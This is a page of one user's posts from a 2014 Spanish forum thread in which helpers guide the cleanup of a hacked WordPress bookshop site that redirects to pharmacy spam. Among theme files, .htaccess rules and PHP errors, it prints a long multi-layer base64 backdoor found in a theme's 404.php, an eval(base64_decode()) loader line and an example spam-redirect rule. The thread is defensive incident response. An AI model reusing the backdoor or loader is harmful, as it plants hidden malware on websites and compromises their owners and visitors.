elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21
61  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 22:22 pm
Yo pense que no habías encontrado nada raro en el index.php, no que no hubieras encontrado nada en el index.php!

Puedes empezar por restaurar ese archivo. :P

Y alguien tuvo que haber llamado a ese archivo para hacerle el:

Código
  1. eval(base64_decode($base64));

El archivo index.php que se encuentra en public_html ESTÁ VACIO.
El archivo index.php que se encuentra en wp-content/themes/wilborada1 tiene el siguiente contenido:

Código
  1. <?php get_header(); ?>
  2.    <div role="main" class="content clearfix">
  3.        <?php get_sidebar(); ?>
  4.        <div class="column-right">
  5.            <div class="main" id="home">
  6.                <div class="banner-top">
  7.                 <div id="flashContent">
  8. <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="670" height="230" id="670x230_02" align="middle">
  9. <param name="movie" value="http://uv1215.us75.toservers.com/wp-content/themes/wilborada/img/header.swf" />
  10. <param name="quality" value="high" />
  11. <param name="bgcolor" value="#ffffff" />
  12. <param name="play" value="true" />
  13. <param name="loop" value="true" />
  14. <param name="wmode" value="window" />
  15. <param name="scale" value="showall" />
  16. <param name="menu" value="true" />
  17. <param name="devicefont" value="false" />
  18. <param name="salign" value="" />
  19. <param name="allowScriptAccess" value="sameDomain" />
  20. <!--[if !IE]>-->
  21. <object type="application/x-shockwave-flash" data="http://uv1215.us75.toservers.com/wp-content/themes/wilborada/img/header.swf" width="670" height="230">
  22. <param name="movie" value="http://uv1215.us75.toservers.com/wp-content/themes/wilborada/img/header.swf" />
  23. <param name="quality" value="high" />
  24. <param name="bgcolor" value="#ffffff" />
  25. <param name="play" value="true" />
  26. <param name="loop" value="true" />
  27. <param name="wmode" value="window" />
  28. <param name="scale" value="showall" />
  29. <param name="menu" value="true" />
  30. <param name="devicefont" value="false" />
  31. <param name="salign" value="" />
  32. <param name="allowScriptAccess" value="sameDomain" />
  33. <!--<![endif]-->
  34. <a href="http://www.adobe.com/go/getflash">
  35. <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
  36. </a>
  37. <!--[if !IE]>-->
  38. </object>
  39. <!--<![endif]-->
  40. </object>
  41. </div>
  42. </div>
  43.                <div class="articulos-destacados">
  44.                    <ul>
  45.                        <?php query_posts(array('category_name' => 'novedades', 'posts_per_page' => 6)); ?>
  46.                        <?php while (have_posts()) : the_post(); ?>
  47.                            <li>
  48.                                <div class="articulo-destacado">
  49.                                    <a class="articulo-destacado-imagen" href="<?php the_permalink() ?>" rel="bookmark"
  50.                                       title="Ver informacion de <?php if (function_exists('the_title_attribute')) the_title_attribute(); else the_title(); ?>">
  51.                                        <?php the_post_thumbnail('thumbnail'); ?>
  52.                                    </a>
  53.  
  54.                                    <div class="articulo-destacado-descripcion">
  55.  
  56.                                        <a class="articulo-destacado-nombre" href="<?php the_permalink() ?>"
  57.                                           rel="bookmark"
  58.                                           title="Ver informacion de <?php if (function_exists('the_title_attribute')) the_title_attribute(); else the_title(); ?>"><?php the_title(); ?></a>
  59.  
  60.                                        <p class="articulo-destacado-autor"><?php echo get_post_meta(get_the_ID(), 'autor', true); ?></p>
  61.  
  62.                                        <p class="articulo-destacado-exerpt"><?php print_excerpt(100); ?></p>
  63.                                        <?php if (get_post_meta(get_the_ID(), 'precio', true) != null) { ?>
  64.                                            <p class="articulo-destacado-precio">
  65.                                                $ <?php echo get_post_meta(get_the_ID(), 'precio', true); ?>.-</p>
  66.                                        <?php } ?>
  67.                                        <a class="articulo-destacado-info" href="<?php the_permalink() ?>"
  68.                                           rel="bookmark"
  69.                                           title="Ver informacion de <?php if (function_exists('the_title_attribute')) the_title_attribute(); else the_title(); ?>">+
  70.                                            info</a>
  71.                                    </div>
  72.                                </div>
  73.                            </li>
  74.                        <?php endwhile; ?>
  75.                    </ul>
  76.                </div>
  77.                <div class="banners-bottom clear">
  78.                    <ul class="clearfix">
  79.                        <li class="banner-mercadolibre">
  80. <a href="http://www.wilboradalibros.com.ar/contacto" target="_blank">
  81. <img src="http://uv1215.us75.toservers.com/wp-content/themes/wilborada/img/compramos-libros.jpg" alt="Compramos libros y vinilos, arte y antiguedades">
  82. </a>
  83. </li>
  84.                        <li class="banner-comprolibros">
  85. <a href="http://eshops.mercadolibre.com.ar/wilborada+libros/" target="_blank">
  86. <img src="http://uv1215.us75.toservers.com/wp-content/themes/wilborada/img/tienda-online.jpg" alt="Tienda Online">
  87. </a>
  88. </li>
  89.                    </ul>
  90.                </div>
  91.            </div>
  92.        </div>
  93.        <div class="clear"></div>
  94.    </div>
  95. <?php get_footer(); ?>
62  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 22:18 pm
Hmmm si fuese algun include, no deberia afectar a todas las paginas ? Incluidas las de wordpress.. sin embargo solo afecta (a mi ver) las que utilizan un tema.. y el archivo 404 ese estaba dentro de un tema..

ka0s podrias cambiar el theme al de por defecto a ver si le afecta tambien.. y si es posible, empaquetar el tema en un .zip y subirlo a algun lado para que podamos descargarlo ?

Saludos

Acá esta el Theme como pedías: http://ge.tt/8Df8qIp1/v/0?c
He cambiado el tema por otro que estaba ahi (el default de Wordpress no se encontraba) pero la web sigue redireccionando.
63  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 21:56 pm
En realidad ese script ha hecho su trabajo xD

Código:
http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació :P

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

Este es el reporte precisamente:



Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca... :)
64  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 21:39 pm
He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de  wp-content/themes



Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto:

Código
  1. ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1ORmFGVmliSEJvVldwR1lXSldjRVpoUnpsT1VsZDRSbFJWWkd0VE1ERjBXak5rWVZKWGFFTlViWFEwVGxVNVdWUnNjRmRsYTFvelYxUkpkMDVYVWxkaVJsSlBWakpvY0ZWcVJtRk9WbEpJVFVSV2JGWnVRVEZVTVdoRFlWZEtWMU51VG1GV1ZUQjRWRlZrVjFOV1ZsaE9Wa0pyVFdwc2VWZFVRbXRTTURGSVVtdFNVbFpIZUV0VmFrcFRZekZ3UmxwR1pHdFdNVXAzVjJwS2MxVXhTbFZpUlZaWFlrWldORlZ0ZUZOak1WWjBWMnhhYUdWdGVGSldiWFJQVTIxT1JtVklRbHBOYWxaUldrUkpOVlJHYkZkYVJuQnBUV3RhV2xaSE1XRlpWa2w1WlVSV1ZFMUZOVlJhUkVaelYxWldkRTlWTVdoV01EUjVWMnRTVDFGdFVrZGhNMnhRVjBaYWNsVnFSbUZOVm5CR1ZHMXdhbEpYZUVkVmJYTTFWVEZGZDFOdVpGcGxhMVV4V1ZSS1IxZFdUbGhQVlhSVVVsVndkbGRyVm10aWJWSldZMFJXVUZaRk5YRlZXSEJIWWpGa2Nsa3phR3BTTUhCM1YxUk9RMU5zU2xaWGJFSldZVEExUTFkcVNrZFhWbEowVjIxR1UwMXVaekZWZWtKUFZUSlJlR0pHYkZaaVZHeE9XVlprVDAxc2NFVlVhMHByVWpCYVdWUnNaSGRo.Vms1SFYyNUtXR0pIYUU5WmJYUXdWa2RLUlZwRlVtaFdhM0I0VjFkd1MxVXlTa2RSYkZKU1lsUkdiMVpxVG05ak1XUkZVMjEwYVZJeFNraFVNV1IzWVZVeGNWWllaRmhpUjAxNFZGVmtUMDVXYjNsa1JuQk9ZVzE0ZVZZeWVGcE9WVEZJVm10c1ZsZEZTbEZhUkVrMVkyeHNWMWw2Um1oTldFSmFXVlZrWVdGc1NYZFhXR1JhVmxVMVExUXhWbk5TUmxaMVdrWndXRkpyY0RKV1JXUnpZVzFTZEZKc2FFOVdNMUpvVmpCa2EwMVdhM2RhUnpsci5UVWhCTWxsNlFqQlRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSV2hwVW5wR1RWVnFSbmRrTVd4eVdrWmtZV0pWTlVwV2JYQkRWMVV4Y2s1VVNscGlWRlpVV1d0a1MyUldWblZqUlhoU1RWVndNMWRYTUhoVk1rcElWbXRrVUZkSFVtRldNRnBMWkd4U1JsUnJTbWhOVjNRMVZERmtNRmxXVlhsa1NHUmhWMGRTTWxkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1pITmFSVGxwVFd0dk1WVldZekZWVmtsNFkwUktXbUpVVmxOWGFrWnlaVlU1V1ZSdGJFNU5SM014VlRGak1WTXlTa2RqUlZKVVZYcFdjUzVaVldoS1lqQTFSVlJZUWsxaGVsWkdWVlpTVjFOc1NsZFhhbFphVFdwQk1WcFdXa05TUlRsWVRWZHNUbUZzVmpOV1ZXUnpZV3MwZVZkc2FGZGlhelZ4VkZkNFdrMHhSWGxpUlVwaFR.VZDRSVlZXWkd0VGJFVjNVbTAxVkZaVk5VTlhha0p6VWtaR1dGcEZjRkpOUlhCNlZqRlNTMkl5VW5KaVJWSmFaVzFvYUZsc1VuTk5WbkJHVkd0T2FHSlZiRFZhVldoaFlXMUdjVkZ1UWxwTmFrWllXVlJDYzJOVk5WWlhiWEJwWVROQmVWZFVTbmROTWxKelkwaFNVRmRHV25KVmExSlRaRlpSZWxwSVdtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlhiWGhIWkd4dmVWZHNhRmRpYXpWeFZGZDRXazB4UlhsTlZtUm9ZbFZhU1ZRd1pHdFRNREZ6VjJwV1drMXFRVEZhVmxaM1RtMU5kMlJITVZaV2VteE5VekZPY2s1NWEzQlBkeWtwT3cpKTs

BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!! :(
65  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 21:29 pm
¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes)

Código
  1. function wp_clear_auth_cookie() {
  2. /**
  3. * Fires just before the authentication cookies are cleared.
  4. *
  5. * @since 2.7.0
  6. */
  7. do_action( 'clear_auth_cookie' );
  8.  
  9. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
  10. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
  11. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
  12. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
  13. setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,          COOKIE_DOMAIN );
  14. setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH,      COOKIE_DOMAIN );
  15.  
  16. // Old cookies
  17. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  18. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  19. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  20. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  21.  
  22. // Even older cookies
  23. setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  24. setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  25. setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  26. setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  27. }
  28. endif;

A partir del primer setcookie sería 883 la línea.
66  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 21:07 pm
Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:

Código:
http://wilboradaslibros.com.ar/wp-admin/

Por cierto estos errores le salian a la dueña antes?

Código:
Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900

Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores.
Que complicado se está volviendo esto :(.
PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy
67  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 21:00 pm
El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien.
Código:
http://www.wilboradalibros.com.ar/readme.html

Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido.

PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer.


Edit:

Código:
http://www.wilboradalibros.com.ar/wp-login.php

Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php

Saludos

#!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío.
Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo?

Nuevamente muchas gracias!!

EDIT:

La línea 154, tiene esto:

Código
  1. * Do not allow accidental or negligent de-registering of critical scripts in the admin.
  2. * Show minimal remorse if the correct hook is used.
  3. */
  4. $current_filter = current_filter();
  5. if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
  6. ( 'wp-login.php' === $GLOBALS['pagenow'] && 'login_enqueue_scripts' !== $current_filter )
  7. ) {
  8. $no = array(
  9. 'jquery', 'jquery-core', 'jquery-migrate', 'jquery-ui-core', 'jquery-ui-accordion',
  10. 'jquery-ui-autocomplete', 'jquery-ui-button', 'jquery-ui-datepicker', 'jquery-ui-dialog',
  11. 'jquery-ui-draggable', 'jquery-ui-droppable', 'jquery-ui-menu', 'jquery-ui-mouse',
  12. 'jquery-ui-position', 'jquery-ui-progressbar', 'jquery-ui-resizable', 'jquery-ui-selectable',
  13. 'jquery-ui-slider', 'jquery-ui-sortable', 'jquery-ui-spinner', 'jquery-ui-tabs',
  14. 'jquery-ui-tooltip', 'jquery-ui-widget', 'underscore', 'backbone',
  15. );
  16.  
  17. if ( in_array( $handle, $no ) ) {
  18. $message = sprintf( __( 'Do not deregister the %1$s script in the administration area. To target the frontend theme, use the %2$s hook.' ),
  19. "<code>$handle</code>", '<code>wp_enqueue_scripts</code>' );
  20. _doing_it_wrong( __FUNCTION__, $message, '3.6' );
  21. return;
  22. }
  23. }
  24.  
  25. $wp_scripts->remove( $handle );
  26. }
  27.  
  28. /**
68  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 20:33 pm
Bueno pues, lo que pasa es que editaron el archivo con un editor de texto para darle formato, como word u oppenoffice. No veo nada raro en el .htaccess. ¿Tienes acceso a todo el servidor o solo al FTP? Si no tienes acceso al servidor y estás pagando a alguien, bien puede ser que todos los sitios alojados en ese servidor esten siendo redireccionados ahí.

Gracias nuevamente por tu tiempo Minus, las primeras 10 lineas del .htaccess yo las ví "raras" pero si tu me dices que eso está Ok, entonces lo dejo así.
Con respecto a lo que preguntaste, Sí, tengo acceso al servidor, pero no se a donde dirigirme o qué modificar para reparar el problema.

Veo lo siguiente:


Y con respecto a lo otro que preguntabas, mi amiga ha hablado con la empresa del servidor y le han dicho lo que puse en el primer post, que la web está infectada y le pasaron esto:

Citar
Malware denominado Seo-Spam en tu Web.

    SEO Spam MW:SPAM:SEO
    
Código:
http://www.wilboradalibros.com.ar/404testpage4525d2fdc
   SEO Spam MW:SPAM:SEO
    
Código:
http://www.wilboradalibros.com.ar/404javascript.js

Que solo es esta web, que no es problema de ellos ya que las otras están bien.

Algo nuevo para hacer?? MUCHAS GRACIAS!!
69  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 20:16 pm
Si ves una linea parecida primero intenta por cambiarle la dirección a la principal, si te redirecciona a la principal borrala.

Minus, al parecer en el .htaccess no hay nada de lo que me has dicho. ME HACE DUDAR LAS PRIMERAS 10 LINEAS. Hay algo mal en eso?. Te lo dejo aquí igualmente.

Código:
{\rtf1\ansi\ansicpg1252\cocoartf1038\cocoasubrtf360
{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red26\green26\blue26;\red246\green246\blue246;\red26\green26\blue26;
\red246\green246\blue246;}
\paperw11900\paperh16840\margl1440\margr1440\vieww9000\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl360

\f0\fs22 \cf2 \cb3 # protege el fichero htaccess\
order allow,deny\
deny from all\
 \
# desactiva la firma del servidor\
ServerSignature Off\
 \
# limita la carga de archivos a 10mb\
LimitRequestBody 10240000\
 \
# protege wpconfig.php\
order allow,deny\
deny from all\
 \
#quien tiene acceso y quien no\
order allow,deny\
 \
#denegar desde 000.000.000.000\
allow from all\
 \
#documentos personalizados de error (lo cambias por los tuyos)\
ErrorDocument 404 /notfound.php\
ErrorDocument 403 /forbidden.php\
ErrorDocument 500 /error.php\
 \
# desactiva la navegacion de directorios\
Options All -Indexes\
 \
 \
\
#desactiva el robo de imagenes con la opcion de una imagen personal\
RewriteEngine on\
RewriteCond %\{HTTP_REFERER\} !^$\
RewriteCond %\{HTTP_REFERER\} !^http://(www\\.)?\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /.*$ [NC]\
#RewriteRule \\.(gif|jpg)$ - [F]\
#RewriteRule \\.(gif|jpg)$ http://\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /imagen_robada.gif [R,L]\
 \
# compresion php - usar con precaucion\
php_value zlib.output_compression 16386\
 \
# establece la url canonica (amigable)\
RewriteEngine On\
RewriteCond %\{HTTP_HOST\} ^\cf4 \cb5 wilborada.com.ar\cf2 \cb3 \\.com$ [NC]\
RewriteRule ^(.*)$ http://\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /$1 [R=301,L]\
 \
# protege de comentarios spam\
RewriteEngine On\
RewriteCond %\{REQUEST_METHOD\} POST\
RewriteCond %\{REQUEST_URI\} .wp-comments-post\\.php*\
RewriteCond %\{HTTP_REFERER\} !.*\cf4 \cb5 wilborada.com.ar\cf2 \cb3 .* [OR]\
RewriteCond %\{HTTP_USER_AGENT\} ^$\
RewriteRule (.*) ^http://%\{REMOTE_ADDR\}/$ [R=301,L]\
RewriteRule ^post/([0-9]+)?/?([0-9]+)?/?$ /index.php?p=$1&page=$2 [QSA]\
}

Con respecto al archivo apache.conf no lo he encontrado donde estaba el .htaccess, estará en otro lugar?

Cada vez me ahogo más en esto :(
70  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 19:53 pm
Revisa por el .htaccess a ver si tienes una regla que vaya a la pagina en cuestión:

Algo así como:

Código:
RewriteRule .* http://safemedpillmarket.com

También podría ser que tengan las redirecciones desde el apache.conf.

Ya mismo me fijo. Me ha dicho mi amiga que me mandó los accesos, y todavía no veo nada. Lo siento por la demora ¬¬.
En el caso de encontrarlo, debo borrar completa esa línea o debo sustituir la web que me figura, por la mía?

Muchas gracias de nuevo!
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines